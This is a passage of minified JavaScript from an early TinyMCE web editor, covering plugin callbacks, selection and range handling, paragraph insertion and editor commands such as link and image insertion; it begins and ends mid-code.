i=0;i<plugins.length;i++){var func="TinyMCE_"+plugins[i]+suffix;if(tinyMCE.isFunc(func)){tinyMCE.exec(func,this.executeCallback.arguments);state=true;}}var func='TinyMCE_'+tinyMCE.settings['theme']+suffix;if(tinyMCE.isFunc(func)){tinyMCE.exec(func,this.executeCallback.arguments);state=true;}var func=tinyMCE.getParam(param,'');if(tinyMCE.isFunc(func)){tinyMCE.exec(func,this.executeCallback.arguments);state=true;}return state;case 1:var plugins=tinyMCE.getParam('plugins','',true,',');for(var i=0;i<plugins.length;i++){var func="TinyMCE_"+plugins[i]+suffix;if(tinyMCE.isFunc(func)){if(tinyMCE.exec(func,this.executeCallback.arguments))return true;}}var func='TinyMCE_'+tinyMCE.settings['theme']+suffix;if(tinyMCE.isFunc(func)){if(tinyMCE.exec(func,this.executeCallback.arguments))return true;}var func=tinyMCE.getParam(param,'');if(tinyMCE.isFunc(func)){if(tinyMCE.exec(func,this.executeCallback.arguments))return true;}return false;}};TinyMCE.prototype.debug=function(){var msg="";var elm=document.getElementById("tinymce_debug");if(!elm){var debugDiv=document.createElement("div");debugDiv.setAttribute("className","debugger");debugDiv.className="debugger";debugDiv.innerHTML='\ Debug output:\ <textarea id="tinymce_debug" style="width: 100%; height: 300px" wrap="nowrap"></textarea>';document.body.appendChild(debugDiv);elm=document.getElementById("tinymce_debug");}var args=this.debug.arguments;for(var i=0;i<args.length;i++){msg+=args[i];if(i<args.length-1)msg+=', ';}elm.value+=msg+"\n";};function TinyMCEControl(settings){this.undoLevels=new Array();this.undoIndex=0;this.typingUndoIndex=-1;this.undoRedo=true;this.isTinyMCEControl=true;this.settings=settings;this.settings['theme']=tinyMCE.getParam("theme","default");this.settings['width']=tinyMCE.getParam("width",-1);this.settings['height']=tinyMCE.getParam("height",-1);};TinyMCEControl.prototype.repaint=function(){if(tinyMCE.isMSIE)return;this.getBody().style.display='none';this.getBody().style.display='block';};TinyMCEControl.prototype.switchSettings=function(){if(tinyMCE.configs.length>1&&tinyMCE.currentConfig!=this.settings['index']){tinyMCE.settings=this.settings;tinyMCE.currentConfig=this.settings['index'];}};TinyMCEControl.prototype.fixBrokenURLs=function(){var body=this.getBody();var elms=body.getElementsByTagName("img");for(var i=0;i<elms.length;i++){var src=elms[i].getAttribute('mce_real_src');if(src&&src!="")elms[i].setAttribute("src",src);}var elms=body.getElementsByTagName("a");for(var i=0;i<elms.length;i++){var href=elms[i].getAttribute('mce_real_href');if(href&&href!="")elms[i].setAttribute("href",href);}};TinyMCEControl.prototype.convertAllRelativeURLs=function(){var body=this.getBody();var elms=body.getElementsByTagName("img");for(var i=0;i<elms.length;i++){var src=elms[i].getAttribute('src');if(src&&src!=""){src=tinyMCE.convertRelativeToAbsoluteURL(tinyMCE.settings['base_href'],src);elms[i].setAttribute("src",src);elms[i].setAttribute("mce_real_src",src);}}var elms=body.getElementsByTagName("a");for(var i=0;i<elms.length;i++){var href=elms[i].getAttribute('href');if(href&&href!=""){href=tinyMCE.convertRelativeToAbsoluteURL(tinyMCE.settings['base_href'],href);elms[i].setAttribute("href",href);elms[i].setAttribute("mce_real_href",href);}}};TinyMCEControl.prototype.getSelectedHTML=function(){if(tinyMCE.isSafari){return this.getRng().toString();}var elm=document.createElement("body");if(tinyMCE.isGecko)elm.appendChild(this.getRng().cloneContents());else elm.innerHTML=this.getRng().htmlText;return tinyMCE._cleanupHTML(this,this.contentDocument,this.settings,elm,this.visualAid);};TinyMCEControl.prototype.getBookmark=function(){var rng=this.getRng();if(tinyMCE.isSafari)return rng;if(tinyMCE.isMSIE)return rng;if(tinyMCE.isGecko)return rng.cloneRange();return null;};TinyMCEControl.prototype.moveToBookmark=function(bookmark){if(tinyMCE.isSafari){var sel=this.getSel().realSelection;sel.setBaseAndExtent(bookmark.startContainer,bookmark.startOffset,bookmark.endContainer,bookmark.endOffset);return true;}if(tinyMCE.isMSIE)return bookmark.select();if(tinyMCE.isGecko){var rng=this.getDoc().createRange();var sel=this.getSel();rng.setStart(bookmark.startContainer,bookmark.startOffset);rng.setEnd(bookmark.endContainer,bookmark.endOffset);sel.removeAllRanges();sel.addRange(rng);return true;}return false;};TinyMCEControl.prototype.getSelectedText=function(){if(tinyMCE.isMSIE){var doc=this.getDoc();if(doc.selection.type=="Text"){var rng=doc.selection.createRange();selectedText=rng.text;}else selectedText='';}else{var sel=this.getSel();if(sel&&sel.toString)selectedText=sel.toString();else selectedText='';}return selectedText;};TinyMCEControl.prototype.selectNode=function(node,collapse,select_text_node,to_start){if(!node)return;if(typeof(collapse)=="undefined")collapse=true;if(typeof(select_text_node)=="undefined")select_text_node=false;if(typeof(to_start)=="undefined")to_start=true;if(tinyMCE.isMSIE){var rng=this.getBody().createTextRange();try{rng.moveToElementText(node);if(collapse)rng.collapse(to_start);rng.select();}catch(e){}}else{var sel=this.getSel();if(!sel)return;if(tinyMCE.isSafari){sel.realSelection.setBaseAndExtent(node,0,node,node.innerText.length);if(collapse){if(to_start)sel.realSelection.collapseToStart();else sel.realSelection.collapseToEnd();}this.scrollToNode(node);return;}var rng=this.getDoc().createRange();if(select_text_node){var nodes=tinyMCE.getNodeTree(node,new Array(),3);if(nodes.length>0)rng.selectNodeContents(nodes[0]);else rng.selectNodeContents(node);}else rng.selectNode(node);if(collapse){if(!to_start&&node.nodeType==3){rng.setStart(node,node.nodeValue.length);rng.setEnd(node,node.nodeValue.length);}else rng.collapse(to_start);}sel.removeAllRanges();sel.addRange(rng);}this.scrollToNode(node);tinyMCE.selectedElement=null;if(node.nodeType==1)tinyMCE.selectedElement=node;};TinyMCEControl.prototype.scrollToNode=function(node){var pos=tinyMCE.getAbsPosition(node);var doc=this.getDoc();var scrollX=doc.body.scrollLeft+doc.documentElement.scrollLeft;var scrollY=doc.body.scrollTop+doc.documentElement.scrollTop;var height=tinyMCE.isMSIE?document.getElementById(this.editorId).style.pixelHeight:this.targetElement.clientHeight;if(!tinyMCE.settings['auto_resize']&&!(pos.absTop>scrollY&&pos.absTop<(scrollY-25+height)))this.contentWindow.scrollTo(pos.absLeft,pos.absTop-height+25);};TinyMCEControl.prototype.getBody=function(){return this.getDoc().body;};TinyMCEControl.prototype.getDoc=function(){return this.contentWindow.document;};TinyMCEControl.prototype.getWin=function(){return this.contentWindow;};TinyMCEControl.prototype.getSel=function(){if(tinyMCE.isMSIE&&!tinyMCE.isOpera)return this.getDoc().selection;var sel=this.contentWindow.getSelection();if(tinyMCE.isSafari&&!sel.getRangeAt){var newSel=new Object();var doc=this.getDoc();function getRangeAt(idx){var rng=new Object();rng.startContainer=this.focusNode;rng.endContainer=this.anchorNode;rng.commonAncestorContainer=this.focusNode;rng.createContextualFragment=function(html){if(html.charAt(0)=='<'){var elm=doc.createElement("div");elm.innerHTML=html;return elm.firstChild;}return doc.createTextNode("UNSUPPORTED, DUE TO LIMITATIONS IN SAFARI!");};rng.deleteContents=function(){doc.execCommand("Delete",false,"");};return rng;}newSel.focusNode=sel.baseNode;newSel.focusOffset=sel.baseOffset;newSel.anchorNode=sel.extentNode;newSel.anchorOffset=sel.extentOffset;newSel.getRangeAt=getRangeAt;newSel.text=""+sel;newSel.realSelection=sel;newSel.toString=function(){return this.text;};return newSel;}return sel;};TinyMCEControl.prototype.getRng=function(){var sel=this.getSel();if(sel==null)return null;if(tinyMCE.isMSIE&&!tinyMCE.isOpera)return sel.createRange();if(tinyMCE.isSafari){var rng=this.getDoc().createRange();var sel=this.getSel().realSelection;rng.setStart(sel.baseNode,sel.baseOffset);rng.setEnd(sel.extentNode,sel.extentOffset);return rng;}return this.getSel().getRangeAt(0);};TinyMCEControl.prototype._insertPara=function(e){function isEmpty(para){function isEmptyHTML(html){return html.replace(new RegExp('[ \t\r\n]+','g'),'').toLowerCase()=="";}if(para.getElementsByTagName("img").length>0)return false;if(para.getElementsByTagName("table").length>0)return false;if(para.getElementsByTagName("hr").length>0)return false;var nodes=tinyMCE.getNodeTree(para,new Array(),3);for(var i=0;i<nodes.length;i++){if(!isEmptyHTML(nodes[i].nodeValue))return false;}return true;}var doc=this.getDoc();var sel=this.getSel();var win=this.contentWindow;var rng=sel.getRangeAt(0);var body=doc.body;var rootElm=doc.documentElement;var self=this;var blockName="P";var rngBefore=doc.createRange();rngBefore.setStart(sel.anchorNode,sel.anchorOffset);rngBefore.collapse(true);var rngAfter=doc.createRange();rngAfter.setStart(sel.focusNode,sel.focusOffset);rngAfter.collapse(true);var direct=rngBefore.compareBoundaryPoints(rngBefore.START_TO_END,rngAfter)<0;var startNode=direct?sel.anchorNode:sel.focusNode;var startOffset=direct?sel.anchorOffset:sel.focusOffset;var endNode=direct?sel.focusNode:sel.anchorNode;var endOffset=direct?sel.focusOffset:sel.anchorOffset;startNode=startNode.nodeName=="BODY"?startNode.firstChild:startNode;endNode=endNode.nodeName=="BODY"?endNode.firstChild:endNode;var startBlock=tinyMCE.getParentBlockElement(startNode);var endBlock=tinyMCE.getParentBlockElement(endNode);if(startBlock!=null){blockName=startBlock.nodeName;if(blockName=="TD"||blockName=="TABLE"||(blockName=="DIV"&&new RegExp('left|right','gi').test(startBlock.style.cssFloat)))blockName="P";}if(tinyMCE.getParentElement(startBlock,"OL,UL")!=null)return false;if((startBlock!=null&&startBlock.nodeName=="TABLE")||(endBlock!=null&&endBlock.nodeName=="TABLE"))startBlock=endBlock=null;var paraBefore=(startBlock!=null&&startBlock.nodeName==blockName)?startBlock.cloneNode(false):doc.createElement(blockName);var paraAfter=(endBlock!=null&&endBlock.nodeName==blockName)?endBlock.cloneNode(false):doc.createElement(blockName);if(/^(H[1-6])$/.test(blockName))paraAfter=doc.createElement("p");var startChop=startNode;var endChop=endNode;node=startChop;do{if(node==body||node.nodeType==9||tinyMCE.isBlockElement(node))break;startChop=node;}while((node=node.previousSibling?node.previousSibling:node.parentNode));node=endChop;do{if(node==body||node.nodeType==9||tinyMCE.isBlockElement(node))break;endChop=node;}while((node=node.nextSibling?node.nextSibling:node.parentNode));if(startChop.nodeName=="TD")startChop=startChop.firstChild;if(endChop.nodeName=="TD")endChop=endChop.lastChild;if(startBlock==null){rng.deleteContents();sel.removeAllRanges();if(startChop!=rootElm&&endChop!=rootElm){rngBefore=rng.cloneRange();if(startChop==body)rngBefore.setStart(startChop,0);else rngBefore.setStartBefore(startChop);paraBefore.appendChild(rngBefore.cloneContents());if(endChop.parentNode.nodeName==blockName)endChop=endChop.parentNode;rng.setEndAfter(endChop);if(endChop.nodeName!="#text"&&endChop.nodeName!="BODY")rngBefore.setEndAfter(endChop);var contents=rng.cloneContents();if(contents.firstChild&&(contents.firstChild.nodeName==blockName||contents.firstChild.nodeName=="BODY"))paraAfter.innerHTML=contents.firstChild.innerHTML;else paraAfter.appendChild(contents);if(isEmpty(paraBefore))paraBefore.innerHTML=" ";if(isEmpty(paraAfter))paraAfter.innerHTML=" ";rng.deleteContents();rngAfter.deleteContents();rngBefore.deleteContents();paraAfter.normalize();rngBefore.insertNode(paraAfter);paraBefore.normalize();rngBefore.insertNode(paraBefore);}else{body.innerHTML="<"+blockName+"> </"+blockName+"><"+blockName+"> </"+blockName+">";paraAfter=body.childNodes[1];}this.selectNode(paraAfter,true,true);return true;}if(startChop.nodeName==blockName)rngBefore.setStart(startChop,0);else rngBefore.setStartBefore(startChop);rngBefore.setEnd(startNode,startOffset);paraBefore.appendChild(rngBefore.cloneContents());rngAfter.setEndAfter(endChop);rngAfter.setStart(endNode,endOffset);var contents=rngAfter.cloneContents();if(contents.firstChild&&contents.firstChild.nodeName==blockName){paraAfter.innerHTML=contents.firstChild.innerHTML;}else paraAfter.appendChild(contents);if(isEmpty(paraBefore))paraBefore.innerHTML=" ";if(isEmpty(paraAfter))paraAfter.innerHTML=" ";var rng=doc.createRange();if(!startChop.previousSibling&&startChop.parentNode.nodeName.toUpperCase()==blockName){rng.setStartBefore(startChop.parentNode);}else{if(rngBefore.startContainer.nodeName.toUpperCase()==blockName&&rngBefore.startOffset==0)rng.setStartBefore(rngBefore.startContainer);else rng.setStart(rngBefore.startContainer,rngBefore.startOffset);}if(!endChop.nextSibling&&endChop.parentNode.nodeName.toUpperCase()==blockName)rng.setEndAfter(endChop.parentNode);else rng.setEnd(rngAfter.endContainer,rngAfter.endOffset);rng.deleteContents();rng.insertNode(paraAfter);rng.insertNode(paraBefore);paraAfter.normalize();paraBefore.normalize();this.selectNode(paraAfter,true,true);return true;};TinyMCEControl.prototype._handleBackSpace=function(evt_type){var doc=this.getDoc();var sel=this.getSel();if(sel==null)return false;var rng=sel.getRangeAt(0);var node=rng.startContainer;var elm=node.nodeType==3?node.parentNode:node;if(node==null)return;if(elm&&elm.nodeName==""){var para=doc.createElement("p");while(elm.firstChild)para.appendChild(elm.firstChild);elm.parentNode.insertBefore(para,elm);elm.parentNode.removeChild(elm);var rng=rng.cloneRange();rng.setStartBefore(node.nextSibling);rng.setEndAfter(node.nextSibling);rng.extractContents();this.selectNode(node.nextSibling,true,true);}var para=tinyMCE.getParentBlockElement(node);if(para!=null&¶.nodeName.toLowerCase()=='p'&&evt_type=="keypress"){var htm=para.innerHTML;var block=tinyMCE.getParentBlockElement(node);if(htm==""||htm==" "||block.nodeName.toLowerCase()=="li"){var prevElm=para.previousSibling;while(prevElm!=null&&prevElm.nodeType!=1)prevElm=prevElm.previousSibling;if(prevElm==null)return false;var nodes=tinyMCE.getNodeTree(prevElm,new Array(),3);var lastTextNode=nodes.length==0?null:nodes[nodes.length-1];if(lastTextNode!=null)this.selectNode(lastTextNode,true,false,false);para.parentNode.removeChild(para);return true;}}return false;};TinyMCEControl.prototype._insertSpace=function(){return true;};TinyMCEControl.prototype.autoResetDesignMode=function(){if(!tinyMCE.isMSIE&&tinyMCE.settings['auto_reset_designmode']){var sel=this.getSel();if(!sel||!sel.rangeCount||sel.rangeCount==0)eval('try { this.getDoc().designMode = "On"; } catch(e) {}');}};TinyMCEControl.prototype.isDirty=function(){return this.startContent!=tinyMCE.trim(this.getBody().innerHTML)&&!tinyMCE.isNotDirty;};TinyMCEControl.prototype._mergeElements=function(scmd,pa,ch,override){if(scmd=="removeformat"){pa.className="";pa.style.cssText="";ch.className="";ch.style.cssText="";return;}var st=tinyMCE.parseStyle(tinyMCE.getAttrib(pa,"style"));var stc=tinyMCE.parseStyle(tinyMCE.getAttrib(ch,"style"));var className=tinyMCE.getAttrib(pa,"class");className+=" "+tinyMCE.getAttrib(ch,"class");if(override){for(var n in st){if(typeof(st[n])=='function')continue;stc[n]=st[n];}}else{for(var n in stc){if(typeof(stc[n])=='function')continue;st[n]=stc[n];}}tinyMCE.setAttrib(pa,"style",tinyMCE.serializeStyle(st));tinyMCE.setAttrib(pa,"class",tinyMCE.trim(className));ch.className="";ch.style.cssText="";ch.removeAttribute("class");ch.removeAttribute("style");};TinyMCEControl.prototype.setUseCSS=function(b){var doc=this.getDoc();try{doc.execCommand("useCSS",false,!b);}catch(ex){}try{doc.execCommand("styleWithCSS",false,b);}catch(ex){}};TinyMCEControl.prototype.execCommand=function(command,user_interface,value){var doc=this.getDoc();var win=this.getWin();var focusElm=this.getFocusElement();if(this.lastSafariSelection&&!new RegExp('mceStartTyping|mceEndTyping|mceBeginUndoLevel|mceEndUndoLevel|mceAddUndoLevel','gi').test(command)){this.moveToBookmark(this.lastSafariSelection);tinyMCE.selectedElement=this.lastSafariSelectedElement;}if(!tinyMCE.isMSIE&&!this.useCSS){this.setUseCSS(false);this.useCSS=true;}this.contentDocument=doc;if(tinyMCE._themeExecCommand(this.editorId,this.getBody(),command,user_interface,value))return;if(focusElm&&focusElm.nodeName=="IMG"){var align=focusElm.getAttribute('align');var img=command=="JustifyCenter"?focusElm.cloneNode(false):focusElm;switch(command){case "JustifyLeft":if(align=='left')img.removeAttribute('align');else img.setAttribute('align','left');var div=focusElm.parentNode;if(div&&div.nodeName=="DIV"&&div.childNodes.length==1&&div.parentNode)div.parentNode.replaceChild(img,div);this.selectNode(img);this.repaint();tinyMCE.triggerNodeChange();return;case "JustifyCenter":img.removeAttribute('align');var div=tinyMCE.getParentElement(focusElm,"div");if(div&&div.style.textAlign=="center"){if(div.nodeName=="DIV"&&div.childNodes.length==1&&div.parentNode)div.parentNode.replaceChild(img,div);}else{var div=this.getDoc().createElement("div");div.style.textAlign='center';div.appendChild(img);focusElm.parentNode.replaceChild(div,focusElm);}this.selectNode(img);this.repaint();tinyMCE.triggerNodeChange();return;case "JustifyRight":if(align=='right')img.removeAttribute('align');else img.setAttribute('align','right');var div=focusElm.parentNode;if(div&&div.nodeName=="DIV"&&div.childNodes.length==1&&div.parentNode)div.parentNode.replaceChild(img,div);this.selectNode(img);this.repaint();tinyMCE.triggerNodeChange();return;}}if(tinyMCE.settings['force_br_newlines']){var alignValue="";if(doc.selection.type!="Control"){switch(command){case "JustifyLeft":alignValue="left";break;case "JustifyCenter":alignValue="center";break;case "JustifyFull":alignValue="justify";break;case "JustifyRight":alignValue="right";break;}if(alignValue!=""){var rng=doc.selection.createRange();if((divElm=tinyMCE.getParentElement(rng.parentElement(),"div"))!=null)divElm.setAttribute("align",alignValue);else if(rng.pasteHTML&&rng.htmlText.length>0)rng.pasteHTML('<div align="'+alignValue+'">'+rng.htmlText+"</div>");tinyMCE.triggerNodeChange();return;}}}switch(command){case "mceRepaint":this.repaint();return true;case "mceStoreSelection":this.selectionBookmark=this.getBookmark();return true;case "mceRestoreSelection":this.moveToBookmark(this.selectionBookmark);return true;case "InsertUnorderedList":case "InsertOrderedList":var tag=(command=="InsertUnorderedList")?"ul":"ol";if(tinyMCE.isSafari)this.execCommand("mceInsertContent",false,"<"+tag+"><li> </li><"+tag+">");else this.getDoc().execCommand(command,user_interface,value);tinyMCE.triggerNodeChange();break;case "Strikethrough":if(tinyMCE.isSafari)this.execCommand("mceInsertContent",false,"<strike>"+this.getSelectedHTML()+"</strike>");else this.getDoc().execCommand(command,user_interface,value);tinyMCE.triggerNodeChange();break;case "mceSelectNode":this.selectNode(value);tinyMCE.triggerNodeChange();tinyMCE.selectedNode=value;break;case "FormatBlock":if(value==null||value==""){var elm=tinyMCE.getParentElement(this.getFocusElement(),"p,div,h1,h2,h3,h4,h5,h6,pre,address");if(elm)this.execCommand("mceRemoveNode",false,elm);}else this.getDoc().execCommand("FormatBlock",false,value);tinyMCE.triggerNodeChange();break;case "mceRemoveNode":if(!value)value=tinyMCE.getParentElement(this.getFocusElement());if(tinyMCE.isMSIE){value.outerHTML=value.innerHTML;}else{var rng=value.ownerDocument.createRange();rng.setStartBefore(value);rng.setEndAfter(value);rng.deleteContents();rng.insertNode(rng.createContextualFragment(value.innerHTML));}tinyMCE.triggerNodeChange();break;case "mceSelectNodeDepth":var parentNode=this.getFocusElement();for(var i=0;parentNode;i++){if(parentNode.nodeName.toLowerCase()=="body")break;if(parentNode.nodeName.toLowerCase()=="#text"){i--;parentNode=parentNode.parentNode;continue;}if(i==value){this.selectNode(parentNode,false);tinyMCE.triggerNodeChange();tinyMCE.selectedNode=parentNode;return;}parentNode=parentNode.parentNode;}break;case "SetStyleInfo":var rng=this.getRng();var sel=this.getSel();var scmd=value['command'];var sname=value['name'];var svalue=value['value']==null?'':value['value'];var wrapper=value['wrapper']?value['wrapper']:"span";var parentElm=null;var invalidRe=new RegExp("^BODY|HTML$","g");var invalidParentsRe=tinyMCE.settings['merge_styles_invalid_parents']!=''?new RegExp(tinyMCE.settings['merge_styles_invalid_parents'],"gi"):null;if(tinyMCE.isMSIE){if(rng.item)parentElm=rng.item(0);else{var pelm=rng.parentElement();var prng=doc.selection.createRange();prng.moveToElementText(pelm);if(rng.htmlText==prng.htmlText||rng.boundingWidth==0){if(invalidParentsRe==null||!invalidParentsRe.test(pelm.nodeName))parentElm=pelm;}}}else{var felm=this.getFocusElement();if(sel.isCollapsed||(/td|tr|tbody|table/ig.test(felm.nodeName)&&sel.anchorNode==felm.parentNode))parentElm=felm;}if(parentElm&&!invalidRe.test(parentElm.nodeName)){if(scmd=="setstyle")tinyMCE.setStyleAttrib(parentElm,sname,svalue);if(scmd=="setattrib")tinyMCE.setAttrib(parentElm,sname,svalue);if(scmd=="removeformat"){parentElm.style.cssText='';tinyMCE.setAttrib(parentElm,'class','');}var ch=tinyMCE.getNodeTree(parentElm,new Array(),1);for(var z=0;z<ch.length;z++){if(ch[z]==parentElm)continue;if(scmd=="setstyle")tinyMCE.setStyleAttrib(ch[z],sname,'');if(scmd=="setattrib")tinyMCE.setAttrib(ch[z],sname,'');if(scmd=="removeformat"){ch[z].style.cssText='';tinyMCE.setAttrib(ch[z],'class','');}}}else{doc.execCommand("fontname",false,"#mce_temp_font#");var elementArray=tinyMCE.getElementsByAttributeValue(this.getBody(),"font","face","#mce_temp_font#");for(var x=0;x<elementArray.length;x++){elm=elementArray[x];if(elm){var spanElm=doc.createElement(wrapper);if(scmd=="setstyle")tinyMCE.setStyleAttrib(spanElm,sname,svalue);if(scmd=="setattrib")tinyMCE.setAttrib(spanElm,sname,svalue);if(scmd=="removeformat"){spanElm.style.cssText='';tinyMCE.setAttrib(spanElm,'class','');}if(elm.hasChildNodes()){for(var i=0;i<elm.childNodes.length;i++)spanElm.appendChild(elm.childNodes[i].cloneNode(true));}spanElm.setAttribute("mce_new","true");elm.parentNode.replaceChild(spanElm,elm);var ch=tinyMCE.getNodeTree(spanElm,new Array(),1);for(var z=0;z<ch.length;z++){if(ch[z]==spanElm)continue;if(scmd=="setstyle")tinyMCE.setStyleAttrib(ch[z],sname,'');if(scmd=="setattrib")tinyMCE.setAttrib(ch[z],sname,'');if(scmd=="removeformat"){ch[z].style.cssText='';tinyMCE.setAttrib(ch[z],'class','');}}}}}var nodes=doc.getElementsByTagName(wrapper);for(var i=nodes.length-1;i>=0;i--){var elm=nodes[i];var isNew=tinyMCE.getAttrib(elm,"mce_new")=="true";elm.removeAttribute("mce_new");if(elm.childNodes&&elm.childNodes.length==1&&elm.childNodes[0].nodeType==1){this._mergeElements(scmd,elm,elm.childNodes[0],isNew);continue;}if(elm.parentNode.childNodes.length==1&&!invalidRe.test(elm.nodeName)&&!invalidRe.test(elm.parentNode.nodeName)){if(invalidParentsRe==null||!invalidParentsRe.test(elm.parentNode.nodeName))this._mergeElements(scmd,elm.parentNode,elm,false);}}var nodes=doc.getElementsByTagName(wrapper);for(var i=nodes.length-1;i>=0;i--){var elm=nodes[i];var isEmpty=true;var tmp=doc.createElement("body");tmp.appendChild(elm.cloneNode(false));tmp.innerHTML=tmp.innerHTML.replace(new RegExp('style=""|class=""','gi'),'');if(new RegExp('<span>','gi').test(tmp.innerHTML)){for(var x=0;x<elm.childNodes.length;x++){if(elm.parentNode!=null)elm.parentNode.insertBefore(elm.childNodes[x].cloneNode(true),elm);}elm.parentNode.removeChild(elm);}}if(scmd=="removeformat")tinyMCE.handleVisualAid(this.getBody(),true,this.visualAid,this);tinyMCE.triggerNodeChange();break;case "FontName":this.getDoc().execCommand('FontName',false,value);if(tinyMCE.isGecko)window.setTimeout('tinyMCE.triggerNodeChange(false);',1);return;case "FontSize":this.getDoc().execCommand('FontSize',false,value);if(tinyMCE.isGecko)window.setTimeout('tinyMCE.triggerNodeChange(false);',1);return;case "forecolor":this.getDoc().execCommand('forecolor',false,value);break;case "HiliteColor":if(tinyMCE.isGecko){this.setUseCSS(true);this.getDoc().execCommand('hilitecolor',false,value);this.setUseCSS(false);}else this.getDoc().execCommand('BackColor',false,value);break;case "Cut":case "Copy":case "Paste":var cmdFailed=false;eval('try {this.getDoc().execCommand(command, user_interface, value);} catch (e) {cmdFailed = true;}');if(tinyMCE.isOpera&&cmdFailed)alert('Currently not supported by your browser, use keyboard shortcuts instead.');if(tinyMCE.isGecko&&cmdFailed){if(confirm(tinyMCE.getLang('lang_clipboard_msg')))window.open('http://www.mozilla.org/editor/midasdemo/securityprefs.html','mceExternal');return;}else tinyMCE.triggerNodeChange();break;case "mceSetContent":if(!value)value="";value=tinyMCE._customCleanup(this,"insert_to_editor",value);tinyMCE._setHTML(doc,value);tinyMCE.setInnerHTML(doc.body,tinyMCE._cleanupHTML(this,doc,tinyMCE.settings,doc.body));tinyMCE.handleVisualAid(doc.body,true,this.visualAid,this);tinyMCE._setEventsEnabled(doc.body,false);return true;case "mceLink":var selectedText="";if(tinyMCE.isMSIE){var rng=doc.selection.createRange();selectedText=rng.text;}else selectedText=this.getSel().toString();if(!tinyMCE.linkElement){if((tinyMCE.selectedElement.nodeName.toLowerCase()!="img")&&(selectedText.length<=0))return;}var href="",target="",title="",onclick="",action="insert",style_class="";if(tinyMCE.selectedElement.nodeName.toLowerCase()=="a")tinyMCE.linkElement=tinyMCE.selectedElement;if(tinyMCE.linkElement!=null&&tinyMCE.getAttrib(tinyMCE.linkElement,'href')=="")tinyMCE.linkElement=null;if(tinyMCE.linkElement){href=tinyMCE.getAttrib(tinyMCE.linkElement,'href');target=tinyMCE.getAttrib(tinyMCE.linkElement,'target');title=tinyMCE.getAttrib(tinyMCE.linkElement,'title');onclick=tinyMCE.getAttrib(tinyMCE.linkElement,'onclick');style_class=tinyMCE.getAttrib(tinyMCE.linkElement,'class');if(onclick=="")onclick=tinyMCE.getAttrib(tinyMCE.linkElement,'onclick');onclick=tinyMCE.cleanupEventStr(onclick);mceRealHref=tinyMCE.getAttrib(tinyMCE.linkElement,'mce_real_href');if(mceRealHref!="")href=mceRealHref;href=eval(tinyMCE.settings['urlconverter_callback']+"(href, tinyMCE.linkElement, true);");action="update";}if(this.settings['insertlink_callback']){var returnVal=eval(this.settings['insertlink_callback']+"(href, target, title, onclick, action, style_class);");if(returnVal&&returnVal['href'])tinyMCE.insertLink(returnVal['href'],returnVal['target'],returnVal['title'],returnVal['onclick'],returnVal['style_class']);}else{tinyMCE.openWindow(this.insertLinkTemplate,{href:href,target:target,title:title,onclick:onclick,action:action,className:style_class});}break;case "mceImage":var src="",alt="",border="",hspace="",vspace="",width="",height="",align="";var title="",onmouseover="",onmouseout="",action="insert";var img=tinyMCE.imgElement;if(tinyMCE.selectedElement!=null&&tinyMCE.selectedElement.nodeName.toLowerCase()=="img"){img=tinyMCE.selectedElement;tinyMCE.imgElement=img;}if(img){if(tinyMCE.getAttrib(img,'name').indexOf('mce_')==0)return;src=tinyMCE.getAttrib(img,'src');alt=tinyMCE.getAttrib(img,'alt');if(alt=="")alt=tinyMCE.getAttrib(img,'title');if(tinyMCE.isGecko){var w=img.style.width;if(w!=null&&w!="")img.setAttribute("width",w);var h=img.style.height;if(h!=null&&h!="")img.setAttribute("height",h);}border=tinyMCE.getAttrib(img,'border');hspace=tinyMCE.getAttrib(img,'hspace');vspace=tinyMCE.getAttrib(img,'vspace');width=tinyMCE.getAttrib(img,'width');height=tinyMCE.getAttrib(img,'height');align=tinyMCE.getAttrib(img,'align');onmouseover=tinyMCE.getAttrib(img,'onmouseover');onmouseout=tinyMCE.getAttrib(img,'onmouseout');title=tinyMCE.getAttrib(img,'title');if(tinyMCE.isMSIE){width=img.attributes['width'].specified?width:"";height=img.attributes['height'].specified?height:"";}onmouseover=tinyMCE.getImageSrc(tinyMCE.cleanupEventStr(onmouseover));onmouseout=tinyMCE.getImageSrc(tinyMCE.cleanupEventStr(onmouseout));mceRealSrc=tinyMCE.getAttrib(img,'mce_real_src');if(mceRealSrc!="")src=mceRealSrc;src=eval(tinyMCE.settings['urlconverter_callback']+"(src, img, true);");if(onmouseover!="")onmouseover=eval(tinyMCE.settings['urlconverter_callback']+"(onmouseover, img, true);");if(onmouseout!="")onmouseout=eval(tinyMCE.settings['urlconverter_callback']+"(onmouseout, img, true);");action="update";}if(this.settings['insertimage_callback']){var returnVal=eval(this.settings['insertimage_callback']+"(src, alt, border, hspace, vspace, width, height, align, title, onmouseover, onmouseout, action);");if(returnVal&&returnVal['src'])tinyMCE.insertImage(returnVal['src'],returnVal['alt'],returnVal['border'],returnVal['hspace'],returnVal['vspace'],returnVal['width'],returnVal['height'],returnVal['align'],returnVal['title'],returnVal['onmouseover'],returnVal['onmouseout']);}else tinyMCE.openWindow(this.insertImageTemplate,{src:src,alt:alt,border:border,hspace:hspace,vspace:vspace,width:width,height:height,align:align,title:title,onmouseover:onmouseover,onmouseout:onmouseout,action:action});break;case "mceCleanup":tinyMCE._setHTML(this.contentDocument,this.getBody().innerHTML);tinyMCE.setInnerHTML(this.getBody(),tinyMCE._cleanupHTML(this,this.contentDocument,this.settings,this.getBody(),this.visualAid));tinyMCE.handleVisualAid(this.getBody(),true,this.visualAid,this);tinyMCE._setEventsEnabled(this.getBody(),false);this.repaint();tinyMCE.triggerNodeChange();break;case "mceReplaceContent":this.getWin().focus();var selectedText="";if(tinyMCE.isMSIE){var rng=doc.selection.createRange();selectedText=rng.text;}else selectedText=this.getSel().toString();if(selectedText.length>0){value=tinyMCE.replaceVar(value,"selection",selectedText);tinyMCE.execCommand('mceInsertContent',false,value);}tinyMCE.triggerNodeChange();break;case "mceSetAttribute":if(typeof(value)=='object'){var targetElms=(typeof(value['targets'])=="undefined")?"p,img,span,div,td,h1,h2,h3,h4,h5,h6,pre,address":value['targets'];var targetNode=tinyMCE.getParentElement(this.getFocusElement(),targetElms);if(targetNode){targetNode.setAttribute(value['name'],value['value']);tinyMCE.triggerNodeChange();}}break;case "mceSetCSSClass":this.execCommand("SetStyleInfo",false,{command:"setattrib",name:"class",value:value});break;case "mceInsertRawHTML":var key='tiny_mce_marker';this.execCommand('mceBeginUndoLevel');this.execCommand('mceInsertContent',false,key);var scrollX=this.getDoc().body.scrollLeft+this.getDoc().documentElement.scrollLeft;var scrollY=this.getDoc().body.scrollTop+this.getDoc().documentElement.scrollTop;var 